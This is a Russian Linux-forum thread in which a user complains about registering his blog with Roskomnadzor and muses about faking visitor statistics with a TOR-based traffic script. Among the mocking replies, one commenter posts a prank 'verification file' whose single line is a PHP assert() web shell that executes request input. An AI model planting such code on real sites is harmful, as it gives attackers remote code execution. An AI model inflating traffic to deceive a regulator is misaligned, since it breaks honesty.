LINUX.ORG.RU
решено ФорумTalks

Пытаюсь внести свой блог в реестр РКН

0

1

http://97-fz.rkn.gov.ru/website-owner/feedback-bloger/

И чего-то оно не работает. Подтверждение по SMS не работает вообще, никакого SMS не приходит, затем на сайте написано что код введён неверно, и самой формы, куда его надо было вводить, не видно. Ладно, хоть подтверждение по e-mail работает.

Но заявку на внесение блога в реестр уже отправлял несколько дней тому назад, а до сих пор ни ответа ни привета.

Вообще мне кажется странным обязательное требование иметь 3000 посетителей, и насколько я понял, опираются они на общедоступные системы сбора статистики, вроде Яндекс.Метрики, то есть, им нужно прислать ссылку на счётчик, где указано, что у тебя действительно есть 3000 посетителей. Интересно, а если я им сам нарисую красивую страничку с фейковой статистикой — прокатит?

Впрочем и это не составит никакого труда, за вечер накатать скриптик, который посредством TOR, используя каждый раз разные ноды, разные IP-адреса, зайдёт на сайт 3000 раз, таким образом нарисовав требуемое кол-во посетителей.

Кому-то уже удалось добровольно зарегистировать себя как блогера?

★★★★★

я думал в запрещенные занести хочешь

а тут воно как

если все твои уники будут с ТОРа, боюсь, тебе свидетельство о регистрации блога принесут люди в форме

fcx ★★★
()

заявку на внесение блога в реестр уже отправлял несколько дней тому назад, а до сих пор ни ответа ни привета.

Вас много, а сайт один! И у него обед!

cipher ★★★★★
()
Ответ на: комментарий от dk-

У меня есть блог, и я как блогер, как гражданин РФ, обязан выполнять требование закона на внесение своего блога в реестр.

Spoofing ★★★★★
() автор топика

Пытаюсь внести свой блог в реестр РКН

Ты снова перестал принимать препараты? К тебе уже выехали санитары.

ilinsky ★★★★★
()
Ответ на: комментарий от Haloperidol

Так точно, в реестр надо если более 10К читателей.
Уот.

Unununij ★★★★
()
Ответ на: комментарий от dk-

Это не блог, это АдЪ и Израиль.
Он меня возбуждает и физически и психически, хочется взять - и поучить Спуфи основам дизайна.

Unununij ★★★★
()

Ты неправильно делаешь. Надо так:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: domain.tld/reestr/reestr-id128032.php
Deleted
()
Последнее исправление: Deleted (всего исправлений: 1)

Блогами считается лишь то, что имеет более 3к уников. Остальное - по закону регистрации не подлежит. Так что уже можешь не заморачиваться.

Во-вторых, если роскомпозор посчитает, что у тебя есть блог (откуда-то узнает статистику), то никто сразу пативен к тебе отправлять не будет. Тебе придёт уведомление с предложением зарегистрироваться. Вот если его проигнорировать - опять же пативен не приедет, просто твой сайт заблокируют (а если твоя основная аудитория знает про ТОР и прокси, то это вообще пофиг).

Так что, если у тебя меньше 3к уников - ты даже по закону ничего делать не должен. А если больше... с учётом дебильности закона, уж лучше подождать, пока сами предложат регистрироваться, не стоит поддерживать маразм. Что-то мне подсказывает, что подобные предложения приходят в первую очередь всяким Навальным.

Ах да, статус «блоггера» в отличии от статуса СМИ не даёт никаких привилегий (у СМИ их немало) - одни обязанности, так что стремиться его получить не слишком разумно.

KivApple ★★★★★
()
Последнее исправление: KivApple (всего исправлений: 3)

[fat]suicide.txt предлагали?[/fat]

mittorn ★★★★★
()

Спуф, у тебя крыша совсем поехала?

StReLoK ☆☆
()

Вообще мне кажется странным обязательное требование иметь 3000 посетителей, и насколько я понял, опираются они на общедоступные системы сбора статистики, вроде Яндекс.Метрики, то есть, им нужно прислать ссылку на счётчик, где указано, что у тебя действительно есть 3000 посетителей. Интересно, а если я им сам нарисую красивую страничку с фейковой статистикой — прокатит?

O_o Совсем упоролся? Зачем? Как раз имеет смысл делать наоборот — фейково занижать количество посетителей, чтоб не надо было регать. Но зачем самому на себя досье-то писать, да ещё и с фейком? Слишком мало проблем в жизни что ли?

Psych218 ★★★★★
()
Ответ на: комментарий от Psych218

Никто на Спуфа внимание не обращает, даже РКН, а ему так не хватает внимания.

Begemoth ★★★★★
()
Последнее исправление: Begemoth (всего исправлений: 1)

Эй, ты зачем тему как «решённую» отметил? Ты reestr-id128032.php положит что ли? :-)

Deleted
()
Последнее исправление: Deleted (всего исправлений: 1)
Ответ на: комментарий от Psych218

O_o Совсем упоролся? Зачем? Как раз имеет смысл делать наоборот — фейково занижать количество посетителей, чтоб не надо было регать. Но зачем самому на себя досье-то писать, да ещё и с фейком? Слишком мало проблем в жизни что ли?

Наверное это понт такой. Зарегистрироваться с фэйковой посещаемостью и повесить баннер в блоге что мол зарегистрирован и показывать его тем самым двум с половиной реальным посетителям. Все просто. Спуф упорот как всегда.

ilinsky ★★★★★
()

Счётчик что дышло

Вообще мне кажется странным обязательное требование иметь 3000 посетителей, и насколько я понял, опираются они на общедоступные системы сбора статистики, вроде Яндекс.Метрики, то есть, им нужно прислать ссылку на счётчик, где указано, что у тебя действительно есть 3000 посетителей. Интересно, а если я им сам нарисую красивую страничку с фейковой статистикой — прокатит?

3000 посетителей за какой время? Что закон говорит от подсчёте этих посетителей? Посетитель это браузер или человек за монитором? Если с одного монитора читают 2 человека, то это 2 посетителя или один? Если я посетил блог вчера и сегодня, это это 2 посетителя или один?

Camel ★★★★★
()

лол. зачем?

спуфя, ты странный.

takino ★★★★★
()

Спуфинг как-бы говорит нам: «Смотрите! Я популярен и у меня много посещений!».

user42 ★★
()

Спуфи в очередной раз пытался доказать, что он не социопат, но даже РКН не поверил ему.

r_a_vic
()
Ответ на: комментарий от Deleted

Это цитата, если что :)

google://reestr-id128032.php

Deleted
()

Мы едем едем едем и едем едем едем и снова едем едем ... едем ... ... ... когда же мы приедем ... пока еще едем ... дашобвысдохли ... ааааа...

А ты уже приехал или еще в процессе?

targitaj ★★★★★
()
Ответ на: комментарий от Unununij

Это такой стиль, не лезьте со своими модными быдлодизайнерскими тенденциями. И так уже многие сайты превратились в одинаковые плоские простыни.

contra_sperm_spero
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.